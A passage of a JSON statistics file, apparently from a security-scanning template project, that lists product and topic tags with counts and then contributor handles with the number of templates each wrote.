,{"name":"webmodule-ee","count":1},{"name":"workresources","count":1},{"name":"fcm","count":1},{"name":"sslmate","count":1},{"name":"yzmcms","count":1},{"name":"gerapy","count":1},{"name":"vnc","count":1},{"name":"siteminder","count":1},{"name":"tectuus","count":1},{"name":"mkdocs","count":1},{"name":"pyspider","count":1},{"name":"oneblog","count":1},{"name":"gsm","count":1},{"name":"netmask","count":1},{"name":"racksnet","count":1},{"name":"kramer","count":1},{"name":"javafaces","count":1},{"name":"proxycrawl","count":1},{"name":"unauthenticated","count":1},{"name":"headers","count":1},{"name":"twig","count":1},{"name":"mongoshake","count":1},{"name":"proxykingdom","count":1},{"name":"tls","count":1},{"name":"dss","count":1},{"name":"version","count":1},{"name":"ncbi","count":1},{"name":"ncomputing","count":1},{"name":"rdp","count":1},{"name":"acme","count":1},{"name":"wp-stats-manager","count":1},{"name":"qts","count":1},{"name":"istat","count":1},{"name":"opencti","count":1},{"name":"daybyday","count":1},{"name":"blitapp","count":1},{"name":"np","count":1},{"name":"arprice-responsive-pricing-table","count":1},{"name":"concrete5","count":1},{"name":"harvardart","count":1},{"name":"emlog","count":1},{"name":"all-in-one-video-gallery","count":1},{"name":"locations","count":1},{"name":"petfinder","count":1},{"name":"beanshell","count":1},{"name":"h2","count":1},{"name":"filetransfer","count":1},{"name":"manager","count":1},{"name":"droneci","count":1},{"name":"permissions","count":1},{"name":"ptr","count":1},{"name":"ilo4","count":1},{"name":"rackup","count":1},{"name":"incomcms","count":1},{"name":"opennms","count":1},{"name":"tarantella","count":1},{"name":"atvise","count":1},{"name":"apiflash","count":1},{"name":"adafruit","count":1},{"name":"angularjs","count":1},{"name":"dbeaver","count":1},{"name":"springframework","count":1},{"name":"airnotifier","count":1},{"name":"liberty","count":1},{"name":"scrapingdog","count":1},{"name":"pagekit","count":1},{"name":"chuangtian","count":1},{"name":"hostio","count":1},{"name":"bitquery","count":1},{"name":"openx","count":1},{"name":"playsms","count":1},{"name":"bitrise","count":1},{"name":"darktrace","count":1},{"name":"bscw","count":1},{"name":"goahead","count":1},{"name":"fastvue","count":1},{"name":"debounce","count":1},{"name":"siebel","count":1},{"name":"nytimes","count":1},{"name":"cuppa","count":1},{"name":"moin","count":1},{"name":"clave","count":1},{"name":"strava","count":1},{"name":"coinranking","count":1},{"name":"qdpm","count":1},{"name":"powertek","count":1},{"name":"flask","count":1},{"name":"turnkey","count":1},{"name":"secnet-ac","count":1},{"name":"qizhi","count":1},{"name":"1forge","count":1},{"name":"workreap","count":1},{"name":"binaryedge","count":1},{"name":"hirak","count":1},{"name":"securenvoy","count":1},{"name":"babel","count":1},{"name":"jhipster","count":1},{"name":"opengraphr","count":1},{"name":"h-sphere","count":1},{"name":"zeppelin","count":1},{"name":"php-fusion","count":1},{"name":"twitter-server","count":1},{"name":"phpldap","count":1},{"name":"webp","count":1},{"name":"qvidium","count":1},{"name":"netic","count":1},{"name":"siteomat","count":1},{"name":"ez","count":1},{"name":"zentral","count":1},{"name":"nsasg","count":1},{"name":"secui","count":1},{"name":"extreme","count":1},{"name":"commvault","count":1},{"name":"lacie","count":1},{"name":"opengear","count":1},{"name":"adb","count":1},{"name":"editor","count":1},{"name":"codeception","count":1},{"name":"tensorflow","count":1},{"name":"sefile","count":1},{"name":"xenforo","count":1},{"name":"cnvd2017","count":1},{"name":"directions","count":1},{"name":"management","count":1},{"name":"shell","count":1},{"name":"dapr","count":1},{"name":"asanhamayesh","count":1},{"name":"hcl","count":1},{"name":"edgemax","count":1},{"name":"suprema","count":1},{"name":"routeros","count":1},{"name":"inspur","count":1},{"name":"biqsdrive","count":1},{"name":"dasan","count":1},{"name":"hotel","count":1},{"name":"hfs","count":1},{"name":"sucuri","count":1},{"name":"tox","count":1},{"name":"member-hero","count":1},{"name":"commscope","count":1},{"name":"lgate","count":1},{"name":"mitel","count":1},{"name":"notebook","count":1},{"name":"kyocera","count":1},{"name":"uvdesk","count":1},{"name":"projector","count":1},{"name":"wpcargo","count":1},{"name":"billquick","count":1},{"name":"cherokee","count":1},{"name":"iterable","count":1},{"name":"scraperapi","count":1},{"name":"amdoren","count":1},{"name":"privatekey","count":1},{"name":"csod","count":1},{"name":"radius","count":1},{"name":"dplus","count":1},{"name":"nconf","count":1},{"name":"jspxcms","count":1},{"name":"piano","count":1},{"name":"msmtp","count":1},{"name":"tracer","count":1},{"name":"locust","count":1},{"name":"bonita","count":1},{"name":"jsapi","count":1},{"name":"zarafa","count":1},{"name":"camunda","count":1},{"name":"realteo","count":1},{"name":"fudforum","count":1},{"name":"file-upload","count":1},{"name":"placeos","count":1},{"name":"sso","count":1},{"name":"mailer","count":1},{"name":"wampserver","count":1},{"name":"spartacus","count":1},{"name":"cucm","count":1},{"name":"h5s","count":1},{"name":"solman","count":1},{"name":"webpconverter","count":1},{"name":"connect","count":1},{"name":"biometrics","count":1},{"name":"oos","count":1},{"name":"flyway","count":1},{"name":"pghero","count":1},{"name":"acemanager","count":1},{"name":"apiman","count":1},{"name":"mailboxvalidator","count":1},{"name":"huemagic","count":1},{"name":"box","count":1},{"name":"smartsheet","count":1},{"name":"phpbb","count":1},{"name":"age-gate","count":1},{"name":"lanproxy","count":1},{"name":"haraj","count":1},{"name":"eibiz","count":1},{"name":"cloudconvert","count":1},{"name":"nps","count":1},{"name":"cql","count":1},{"name":"ueditor","count":1},{"name":"okta","count":1},{"name":"openid","count":1},{"name":"hdnetwork","count":1},{"name":"iceflow","count":1},{"name":"clearcom","count":1},{"name":"tamronos","count":1},{"name":"recovery","count":1},{"name":"likebtn-like-button","count":1},{"name":"malwarebazaar","count":1},{"name":"lotuscms","count":1},{"name":"event","count":1},{"name":"find","count":1},{"name":"phpwiki","count":1},{"name":"monday","count":1},{"name":"sympa","count":1},{"name":"beego","count":1},{"name":"officekeeper","count":1},{"name":"ubiquiti","count":1},{"name":"nexusdb","count":1},{"name":"cloudfoundry","count":1},{"name":"pricing-deals-for-woocommerce","count":1},{"name":"orangeforum","count":1},{"name":"speed","count":1},{"name":"route","count":1},{"name":"barracuda","count":1},{"name":"burp","count":1},{"name":"suitecrm","count":1},{"name":"zerodium","count":1},{"name":"simplecrm","count":1},{"name":"opensns","count":1},{"name":"labtech","count":1},{"name":"blackduck","count":1},{"name":"wmt","count":1},{"name":"jsonbin","count":1},{"name":"openv500","count":1},{"name":"concourse","count":1},{"name":"aircube","count":1},{"name":"slocum","count":1},{"name":"piwik","count":1},{"name":"serpstack","count":1},{"name":"joget","count":1},{"name":"rmc","count":1},{"name":"visualtools","count":1},{"name":"codestats","count":1},{"name":"h3c-imc","count":1},{"name":"privx","count":1},{"name":"secnet","count":1},{"name":"weboftrust","count":1},{"name":"securityspy","count":1},{"name":"zcms","count":1},{"name":"devalcms","count":1},{"name":"hunter","count":1},{"name":"x-ray","count":1},{"name":"securepoint","count":1},{"name":"ecom","count":1},{"name":"aero","count":1},{"name":"jvm","count":1},{"name":"amt","count":1},{"name":"logger1000","count":1},{"name":"scalar","count":1},{"name":"biotime","count":1},{"name":"openerp","count":1},{"name":"alquist","count":1},{"name":"openedx","count":1},{"name":"chromium","count":1},{"name":"d-link","count":1},{"name":"chronoforums","count":1},{"name":"phpok","count":1},{"name":"u5cms","count":1},{"name":"xmpp","count":1},{"name":"timesheet","count":1},{"name":"prismaweb","count":1},{"name":"lionwiki","count":1},{"name":"sauter","count":1},{"name":"mozilla","count":1},{"name":"fanwei","count":1},{"name":"varnish","count":1},{"name":"dropbear","count":1},{"name":"clearbit","count":1},{"name":"learnpress","count":1},{"name":"hypertest","count":1},{"name":"seopanel","count":1},{"name":"contentkeeper","count":1},{"name":"kvm","count":1},{"name":"jumpserver","count":1},{"name":"gemweb","count":1},{"name":"rss","count":1},{"name":"pan","count":1},{"name":"apcu","count":1},{"name":"patreon","count":1},{"name":"gnu","count":1},{"name":"zaver","count":1},{"name":"sitemap","count":1},{"name":"ti-woocommerce-wishlist","count":1},{"name":"cron","count":1},{"name":"dotclear","count":1},{"name":"zoneminder","count":1},{"name":"xdcms","count":1},{"name":"perl","count":1},{"name":"ocs-inventory","count":1},{"name":"savepage","count":1},{"name":"geddy","count":1},{"name":"tiny","count":1},{"name":"sgp","count":1},{"name":"thinkserver","count":1},{"name":"notion","count":1},{"name":"shirnecms","count":1},{"name":"wowza","count":1},{"name":"iucn","count":1},{"name":"connect-central","count":1},{"name":"facturascripts","count":1},{"name":"supersign","count":1},{"name":"asana","count":1},{"name":"cors","count":1},{"name":"payroll","count":1},{"name":"hiring","count":1},{"name":"richfaces","count":1},{"name":"m-files","count":1},{"name":"moveit","count":1},{"name":"moonpay","count":1},{"name":"oam","count":1},{"name":"emobile","count":1},{"name":"rwebserver","count":1},{"name":"kubeflow","count":1},{"name":"nimble","count":1},{"name":"phpsec","count":1},{"name":"dnn","count":1},{"name":"shortcode","count":1},{"name":"archibus","count":1},{"name":"fatwire","count":1},{"name":"gateone","count":1},{"name":"scs","count":1},{"name":"monitoring","count":1},{"name":"addpac","count":1},{"name":"svnserve","count":1},{"name":"simply-schedule-appointments","count":1},{"name":"karma","count":1},{"name":"dotnetcms","count":1},{"name":"doh","count":1},{"name":"wago","count":1},{"name":"yaws","count":1},{"name":"airtable","count":1},{"name":"gira","count":1},{"name":"pagespeed","count":1},{"name":"finereport","count":1},{"name":"cvms","count":1},{"name":"dvdFab","count":1},{"name":"myvuehelp","count":1},{"name":"parentlink","count":1},{"name":"solarlog","count":1},{"name":"myanimelist","count":1},{"name":"spip","count":1},{"name":"opnsense","count":1},{"name":"vivotex","count":1},{"name":"currencyfreaks","count":1},{"name":"vcloud","count":1},{"name":"eyoumail","count":1},{"name":"jabber","count":1},{"name":"lancom","count":1},{"name":"hydra","count":1},{"name":"pane","count":1},{"name":"malshare","count":1},{"name":"imagements","count":1},{"name":"apigee","count":1},{"name":"klog","count":1},{"name":"workspace","count":1},{"name":"smf","count":1},{"name":"kerio","count":1},{"name":"shopify","count":1},{"name":"reprise","count":1},{"name":"contentful","count":1},{"name":"gargoyle","count":1},{"name":"ymhome","count":1},{"name":"sicom","count":1},{"name":"xunchi","count":1},{"name":"lg-nas","count":1},{"name":"microfinance","count":1},{"name":"phpsocialnetwork","count":1},{"name":"quixplorer","count":1},{"name":"saltapi","count":1},{"name":"zookeeper","count":1},{"name":"axiom","count":1},{"name":"dahua","count":1},{"name":"sony","count":1},{"name":"todoist","count":1},{"name":"scimono","count":1},{"name":"saml","count":1},{"name":"flyteconsole","count":1},{"name":"europeana","count":1},{"name":"3com","count":1},{"name":"office365","count":1},{"name":"dreamweaver","count":1},{"name":"tooljet","count":1},{"name":"i3geo","count":1},{"name":"dbt","count":1},{"name":"juniper","count":1},{"name":"telecom","count":1},{"name":"drone","count":1},{"name":"intellect","count":1},{"name":"nifi","count":1},{"name":"acontent","count":1},{"name":"rconfig.exposure","count":1},{"name":"ethereum","count":1},{"name":"icinga","count":1},{"name":"clockwatch","count":1},{"name":"short.io","count":1},{"name":"dwr","count":1},{"name":"netgenie","count":1},{"name":"satellian","count":1},{"name":"gofile","count":1},{"name":"apos","count":1},{"name":"pieregister","count":1},{"name":"arris","count":1},{"name":"sourcebans","count":1},{"name":"acs","count":1},{"name":"jinher","count":1},{"name":"retool","count":1},{"name":"behat","count":1},{"name":"webasyst","count":1},{"name":"timezone","count":1},{"name":"openethereum","count":1},{"name":"thinkadmin","count":1},{"name":"messenger","count":1},{"name":"cloudera","count":1},{"name":"googlemaps","count":1},{"name":"vanguard","count":1},{"name":"dropbox","count":1},{"name":"wing-ftp","count":1},{"name":"avigilon","count":1},{"name":"esmtp","count":1},{"name":"spectracom","count":1},{"name":"notificationx","count":1},{"name":"commerce","count":1},{"name":"vercel","count":1},{"name":"incapptic-connect","count":1},{"name":"expose","count":1},{"name":"fortigates","count":1},{"name":"ssi","count":1},{"name":"ddownload","count":1},{"name":"cvent","count":1},{"name":"omni","count":1},{"name":"mdb","count":1},{"name":"badgeos","count":1},{"name":"announcekit","count":1},{"name":"thedogapi","count":1},{"name":"landrayoa","count":1},{"name":"ccm","count":1},{"name":"shopware","count":1},{"name":"edms","count":1},{"name":"youtube","count":1},{"name":"fhem","count":1},{"name":"planon","count":1},{"name":"mapbox","count":1},{"name":"yachtcontrol","count":1},{"name":"qmail","count":1},{"name":"myucms","count":1},{"name":"cloudcenter","count":1},{"name":"avalanche","count":1},{"name":"peoplesoft","count":1},{"name":"pelco","count":1},{"name":"details","count":1},{"name":"supportivekoala","count":1},{"name":"ucs","count":1},{"name":"fox","count":1},{"name":"pkp-lib","count":1},{"name":"iq-block-country","count":1},{"name":"flexbe","count":1},{"name":"eyou","count":1},{"name":"powerjob","count":1},{"name":"pop3","count":1},{"name":"totolink","count":1},{"name":"intel","count":1},{"name":"themefusion","count":1},{"name":"turbocrm","count":1},{"name":"garagemanagementsystem","count":1},{"name":"smarterstats","count":1},{"name":"photostation","count":1},{"name":"domos","count":1},{"name":"prexview","count":1},{"name":"pichome","count":1},{"name":"woody","count":1},{"name":"webshell","count":1},{"name":"intouch","count":1},{"name":"containers","count":1},{"name":"cofense","count":1},{"name":"trello","count":1},{"name":"cpanel","count":1},{"name":"aspnuke","count":1},{"name":"jobsearch","count":1},{"name":"exchangerateapi","count":1},{"name":"e-mobile","count":1},{"name":"b2evolution","count":1},{"name":"flowdash","count":1},{"name":"uservoice","count":1},{"name":"securitytrails","count":1},{"name":"comodo","count":1},{"name":"adminset","count":1},{"name":"defi","count":1},{"name":"floc","count":1},{"name":"primetek","count":1},{"name":"robomongo","count":1},{"name":"getgrav","count":1},{"name":"brandfolder","count":1},{"name":"parse","count":1},{"name":"jeewms","count":1},{"name":"wazuh","count":1},{"name":"amcrest","count":1},{"name":"optimizely","count":1},{"name":"metform","count":1},{"name":"datahub","count":1},{"name":"default","count":1},{"name":"footprints","count":1},{"name":"wifisky","count":1},{"name":"paneil","count":1},{"name":"utility","count":1},{"name":"sungrow","count":1},{"name":"rmi","count":1},{"name":"scrutinizer","count":1},{"name":"sco","count":1},{"name":"easync-booking","count":1},{"name":"userstack","count":1},{"name":"nc2","count":1},{"name":"okiko","count":1},{"name":"wix","count":1},{"name":"faust","count":1},{"name":"duomicms","count":1},{"name":"shortpixel","count":1},{"name":"pulsesecure","count":1},{"name":"wagtail","count":1},{"name":"cve1028","count":1},{"name":"buttercms","count":1},{"name":"bazarr","count":1},{"name":"soplanning","count":1},{"name":"hiawatha","count":1},{"name":"phpMyChat","count":1},{"name":"clearfy-cache","count":1},{"name":"ipanel","count":1},{"name":"chevereto","count":1},{"name":"zm","count":1},{"name":"ricoh","count":1}],"authors":[{"name":"dhiyaneshdk","count":692},{"name":"daffainfo","count":662},{"name":"pikpikcu","count":340},{"name":"pdteam","count":274},{"name":"geeknik","count":197},{"name":"dwisiswant0","count":171},{"name":"0x_akoko","count":170},{"name":"pussycat0x","count":168},{"name":"ritikchaddha","count":161},{"name":"princechaddha","count":153},{"name":"gy741","count":135},{"name":"arafatansari","count":102},{"name":"tess","count":82},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":61},{"name":"akincibor","count":51},{"name":"for3stco1d","count":48},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"edoardottt","count":34},{"name":"adam crosser","count":31},{"name":"theamanrawat","count":31},{"name":"ice3man","count":26},{"name":"c-sh0","count":26},{"name":"organiccrap","count":24},{"name":"righettod","count":23},{"name":"ffffffff0x","count":22},{"name":"techbrunchfr","count":21},{"name":"cckuailong","count":18},{"name":"sullo","count":17},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"random-robbie","count":13},{"name":"sharath","count":13},{"name":"0ri2n","count":13},{"name":"johnk3r","count":13},{"name":"tenbird","count":13},{"name":"melbadry9","count":12},{"name":"suman_kar","count":12},{"name":"dogasantos","count":11},{"name":"cyllective","count":11},{"name":"elsfa7110","count":11},{"name":"wdahlenb","count":11},{"name":"nadino","count":10},{"name":"logicalhunter","count":10},{"name":"alph4byt3","count":10},{"name":"hackergautam","count":10},{"name":"random_robbie","count":10},{"name":"meme-lord","count":10},{"name":"emadshanab","count":9},{"name":"oppsec","count":9},{"name":"0x240x23elu","count":9},{"name":"zh","count":8},{"name":"iamthefrogy","count":8},{"name":"veshraj","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"lu4nx","count":8},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"leovalcante","count":7},{"name":"kophjager007","count":7},{"name":"amit-jd","count":7},{"name":"divya_mudgal","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"caspergn","count":7},{"name":"iamnoooob","count":6},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"imnightmaree","count":6},{"name":"nullfuzz","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"forgedhallpass","count":6},{"name":"rootxharsh","count":6},{"name":"ricardomaia","count":6},{"name":"_0xf4n9x_","count":6},{"name":"pathtaga","count":6},{"name":"evan rubinstein","count":6},{"name":"gitlab red team","count":6},{"name":"__fazal","count":6},{"name":"panch0r3d","count":5},{"name":"podalirius","count":5},{"name":"prajiteshsingh","count":5},{"name":"joanbono","count":5},{"name":"nodauf","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"clem9669","count":5},{"name":"defr0ggy","count":4},{"name":"r3naissance","count":4},{"name":"its0x08","count":4},{"name":"dolev farhi","count":4},{"name":"e_schultze_","count":4},{"name":"dadevel","count":4},{"name":"scent2d","count":4},{"name":"h1ei1","count":4},{"name":"incogbyte","count":4},{"name":"tanq16","count":4},{"name":"robotshell","count":4},{"name":"wisnupramoedya","count":4},{"name":"0xlittleboy","count":4},{"name":"3th1c_yuk1","count":4},{"name":"mavericknerd","count":3},{"name":"emenalf","count":3},{"name":"lucasljm2001","count":3},{"name":"me9187","count":3},{"name":"atomiczsec","count":3},{"name":"swissky","count":3},{"name":"davidmckennirey","count":3},{"name":"fyoorer","count":3},{"name":"f1tz","count":3},{"name":"thomas_from_offensity","count":3},{"name":"andydoering","count":3},{"name":"lark-lab","count":3},{"name":"fxploit","count":3},{"name":"_generic_human_","count":3},{"name":"impramodsargar","count":3},{"name":"whoever","count":3},{"name":"hahwul","count":3},{"name":"0w4ys","count":3},{"name":"sushantkamble","count":3},{"name":"johnjhacking","count":3},{"name":"powerexploit","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"ph33r","count":3},{"name":"shifacyclewala","count":3},{"name":"dr0pd34d","count":3},{"name":"kh4sh3i","count":3},{"name":"alifathi-h1","count":3},{"name":"arcc","count":3},{"name":"shine","count":3},{"name":"binaryfigments","count":3},{"name":"mr-xn","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"splint3r7","count":3},{"name":"skeltavik","count":3},{"name":"ekrause","count":3},{"name":"supras","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"unstabl3","count":3},{"name":"myztique","count":2},{"name":"bing0o","count":2},{"name":"thardt-praetorian","count":2},{"name":"kiblyn11","count":2},{"name":"8arthur","count":2},{"name":"sbani","count":2},{"name":"thezakman","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"hackerarpan","count":2},{"name":"0xcrypto","count":2},{"name":"n-thumann","count":2},{"name":"dahse89","count":2},{"name":"convisoappsec","count":2},{"name":"y4er","count":2},{"name":"raesene","count":2},{"name":"v0idc0de","count":2},{"name":"dbrwsky","count":2},{"name":"codexlynx","count":2},{"name":"paradessia","count":2},{"name":"evergreencartoons","count":2},{"name":"0xnirvana","count":2},{"name":"zomsop82","count":2},{"name":"smaranchand","count":2},{"name":"wa1tf0rme","count":2},{"name":"true13","count":2},{"name":"canberbamber","count":2},{"name":"vavkamil","count":2},{"name":"0xsapra","count":2},{"name":"dheerajmadhukar","count":2},{"name":"amsda","count":2},{"name":"huowuzhao","count":2},{"name":"vsh00t","count":2},{"name":"cckuakilong","count":2},{"name":"666asd","count":2},{"name":"randomrobbie","count":2},{"name":"nvn1729","count":2},{"name":"0xprial","count":2},{"name":"bp0lr","count":2},{"name":"lotusdll","count":2},{"name":"parth","count":2},{"name":"bsysop","count":2},{"name":"taielab","count":2},{"name":"korteke","count":2},{"name":"sy3omda","count":2},{"name":"github.com/its0x08","count":2},{"name":"bernardofsr","count":2},{"name":"nkxxkn","count":2},{"name":"koti2","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"gal nagli","count":2},{"name":"mohammedsaneem","count":2},{"name":"badboycxcc","count":2},{"name":"foulenzer","count":2},{"name":"ehsahil","count":2},{"name":"r12w4n","count":2},{"name":"brenocss","count":2},{"name":"bananabr","count":2},{"name":"0xrudra","count":2},{"name":"danielmofer","count":2},{"name":"geekby","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"moritz nentwig","count":2},{"name":"x1m_martijn","count":2},{"name":"d4vy","count":2},{"name":"joshlarsen","count":2},{"name":"clarkvoss","count":2},{"name":"paperpen","count":2},{"name":"w4cky_","count":2},{"name":"ajaysenr","count":2},{"name":"0xsmiley","count":2},{"name":"udit_thakkur","count":2},{"name":"afaq","count":2},{"name":"kre80r","count":2},{"name":"cocxanh","count":2},{"name":"redteambrasil","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"z0ne","count":2},{"name":"ree4pwn","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"pxmme1337","count":2},{"name":"rafaelwdornelas","count":2},{"name":"nuk3s3c","count":2},{"name":"gevakun","count":2},{"name":"socketz","count":2},{"name":"k11h-de","count":2},{"name":"martincodes-de","count":2},{"name":"luci","count":2},{"name":"g4l1t0","count":2},{"name":"ambassify","count":2},{"name":"uomogrande","count":2},{"name":"0xelkomy","count":2},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"pascalheidmann","count":1},{"name":"rotemreiss","count":1},{"name":"viondexd","count":1},{"name":"jeya seelan","count":1},{"name":"akash.c","count":1},{"name":"sak1","count":1},{"name":"tea","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"luskabol","count":1},{"name":"justmumu","count":1},{"name":"hexcat","count":1},{"name":"dievus","count":1},{"name":"piyushchhiroliya","count":1},{"name":"open-sec","count":1},{"name":"pry0cc","count":1},{"name":"s0obi","count":1},{"name":"megamansec","count":1},{"name":"kishore-hariram","count":1},{"name":"ggranjus","count":1},{"name":"hakimkt","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"affix","count":1},{"name":"sherlocksecurity","count":1},{"name":"thevillagehacker","count":1},{"name":"luqmaan hadia","count":1},{"name":"ipanda","count":1},{"name":"kiks7","count":1},{"name":"wabafet","count":1},{"name":"udyz","count":1},{"name":"alevsk","count":1},{"name":"erethon","count":1},{"name":"revblock","count":1},{"name":"pdp","count":1},{"name":"davidfegyver","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"narluin","count":1},{"name":"marcos_iaf","count":1},{"name":"manasmbellani","count":1},{"name":"anon-artist","count":1},{"name":"w0tx","count":1},{"name":"realexp3rt","count":1},{"name":"elmahdi","count":1},{"name":"retr02332","count":1},{"name":"oscarintherocks","count":1},{"name":"jna1","count":1},{"name":"djoevanka","count":1},{"name":"0xrod","count":1},{"name":"kiransau","count":1},{"name":"paper-pen","count":1},{"name":"thebinitghimire","count":1},{"name":"miryangjung","count":1},{"name":"bughuntersurya","count":1},{"name":"adrianmf","count":1},{"name":"brabbit10","count":1},{"name":"rojanrijal","count":1},{"name":"iphantasmic","count":1},{"name":"official_blackhat13","count":1},{"name":"akshansh","count":1},{"name":"hanlaomo","count":1},{"name":"philippdelteil","count":1},{"name":"0xh7ml","count":1},{"name":"mubassirpatel","count":1},{"name":"juicypotato1","count":1},{"name":"ohlinge","count":1},{"name":"liquidsec","count":1},{"name":"tim_koopmans","count":1},{"name":"shreyapohekar","count":1},{"name":"alexrydzak","count":1},{"name":"arall","count":1},{"name":"igibanez","count":1},{"name":"deena","count":1},{"name":"rodnt","count":1},{"name":"becivells","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"noamrathaus","count":1},{"name":"majidmc2","count":1},{"name":"duty_1g","count":1},{"name":"retr0","count":1},{"name":"lingtren","count":1},{"name":"sickwell","count":1},{"name":"kurohost","count":1},{"name":"5up3r541y4n","count":1},{"name":"shelld3v","count":1},{"name":"droberson","count":1},{"name":"lamscun","count":1},{"name":"allenwest24","count":1},{"name":"sicksec","count":1},{"name":"af001","count":1},{"name":"s1r1u5_","count":1},{"name":"yuansec","count":1},{"name":"sinkettu","count":1},{"name":"harshinsecurity","count":1},{"name":"zinminphy0","count":1},{"name":"shockwave","count":1},{"name":"amanrawat","count":1},{"name":"fmunozs","count":1},{"name":"furkansayim","count":1},{"name":"tirtha","count":1},{"name":"zsusac","count":1},{"name":"mah3sec_","count":1},{"name":"jiheon-dev","count":1},{"name":"0xceeb","count":1},{"name":"streetofhackerr007","count":1},{"name":"makyotox","count":1},{"name":"8authur","count":1},{"name":"b0yd","count":1},{"name":"evan rubinstien","count":1},{"name":"alperenkesk","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"bad5ect0r","count":1},{"name":"micha3lb3n","count":1},{"name":"maximus decimus","count":1},{"name":"y0no","count":1},{"name":"queencitycyber","count":1},{"name":"mhdsamx","count":1},{"name":"kailashbohara","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"flag007","count":1},{"name":"ola456","count":1},{"name":"qlkwej","count":1},{"name":"coldfish","count":1},{"name":"exid","count":1},{"name":"nagli","count":1},{"name":"gboddin","count":1},{"name":"ph33rr","count":1},{"name":"phyr3wall","count":1},{"name":"ptonewreckin","count":1},{"name":"act1on3","count":1},{"name":"xshuden","count":1},{"name":"0h1in9e","count":1},{"name":"0xtavian","count":1},{"name":"jas37","count":1},{"name":"ringo","count":1},{"name":"patralos","count":1},{"name":"breno_css","count":1},{"name":"viniciuspereiras","count":1},{"name":"bartu utku sarp","count":1},{"name":"fopina","count":1},{"name":"ilovebinbash","count":1},{"name":"mrcl0wnlab","count":1},{"name":"kabirsuda","count":1},{"name":"mesaglio","count":1},{"name":"zhenwarx","count":1},{"name":"1nf1n7y","count":1},{"name":"xeldax","count":1},{"name":"ling","count":1},{"name":"ldionmarcil","count":1},{"name":"skylark-lab","count":1},{"name":"husain","count":1},{"name":"iampritam","count":1},{"name":"theabhinavgaur","count":1},{"name":"kareemse1im","count":1},{"name":"fq_hsu","count":1},{"name":"httpvoid","count":1},{"name":"jrolf","count":1},{"name":"vzamanillo","count":1},{"name":"geraldino2","count":1},{"name":"alex","count":1},{"name":"notnotnotveg","count":1},{"name":"florianmaak","count":1},{"name":"yashgoti","count":1},{"name":"xstp","count":1},{"name":"wlayzz","count":1},{"name":"aringo","count":1},{"name":"2rs3c","count":1},{"name":"ahmetpergamum","count":1},{"name":"th3.d1p4k","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"pratik khalane","count":1},{"name":"kr1shna4garwal","count":1},{"name":"secthebit","count":1},{"name":"yavolo","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"shifacyclewla","count":1},{"name":"nobody","count":1},{"name":"infosecsanyam","count":1},{"name":"bjhulst","count":1},{"name":"knassar702","count":1},{"name":"udinchan","count":1},{"name":"jeya.seelan","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"0xteles","count":1},{"name":"furkansenan","count":1},{"name":"chron0x","count":1},{"name":"evolutionsec","count":1},{"name":"exploitation","count":1},{"name":"ooooooo_q","count":1},{"name":"ok_bye_now","count":1},{"name":"sshell","count":1},{"name":"francescocarlucci","count":1},{"name":"intx0x80","count":1},{"name":"thelicato","count":1},{"name":"whynotke","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"sec_hawk","count":1},{"name":"apt-mirror","count":1},{"name":"elitebaz","count":1},{"name":"co0nan","count":1},{"name":"opencirt","count":1},{"name":"d0rkerdevil","count":1},{"name":"orpheus","count":1},{"name":"0xd0ff9","count":1},{"name":"ahmed sherif","count":1},{"name":"exceed","count":1},{"name":"toufik-airane","count":1},{"name":"natto97","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"aaronchen0","count":1},{"name":"regala_","count":1},{"name":"jbaines-r7","count":1},{"name":"charanrayudu","count":1},{"name":"unkl4b","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"aayush vishnoi","count":1},{"name":"nerrorsec","count":1},{"name":"mass0ma","count":1},{"name":"dk999","count":1},{"name":"carlosvieira","count":1},{"name":"momen eldawakhly","count":1},{"name":"ramkrishna sawant","count":1},{"name":"ofjaaah","count":1},{"name":"ahmed abou-ela","count":1},{"name":"screamy","count":1},{"name":"zandros0","count":1},{"name":"noraj","count":1},{"name":"lethargynavigator","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"pjborah","count":1},{"name":"hardik-rathod","count":1},{"name":"jcockhren","count":1},{"name":"compr00t","count":1},{"name":"dale clarke","count":1},{"name":"schniggie","count":1},{"name":"miroslavsotak","count":1},{"name":"rschio","count":1},{"name":"nytr0gen","count":1},{"name":"arr0way","count":1},{"name":"hakluke","count":1},{"name":"jteles","count":1},{"name":"borna 